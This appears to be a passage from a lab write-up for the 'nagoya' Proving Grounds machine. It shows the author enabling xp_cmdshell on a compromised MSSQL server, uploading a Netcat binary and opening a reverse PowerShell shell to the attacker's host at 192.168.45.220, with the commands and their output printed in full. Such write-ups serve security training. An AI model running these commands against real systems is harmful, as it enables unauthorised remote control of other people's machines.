svc_mssql
Upon a successful TGS forgery, I have established a session to the the target’s internal MSSQL instance.
SQL (NAGOYA-IND\Administrator dbo@master)> enable_xp_cmdshell
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell whoami
output
--------------------
nagoya-ind\svc_mssql
NULLEnabling xp_cmdshell
*Evil-WinRM* PS C:\tmp> upload nc64.exe
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/nc64.exe to C:\tmp\nc64.exe
Data: 58260 bytes of 58260 bytes copied
Info: Upload successful!Delivering a Netcat binary
SQL (NAGOYA-IND\Administrator dbo@master)> xp_cmdshell "C:\tmp\nc64.exe 192.168.45.220 4444 -e powershell"Invoking a reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.220] from (UNKNOWN) [192.168.158.21] 50239
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nagoya-ind\svc_mssql
PS C:\Windows\system32> hostname
hostname
nagoya
PS C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.158.21
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.158.254Lateral Movement made to the DC host as the svc_mssql account via compromising the target’s internal MSSQL instance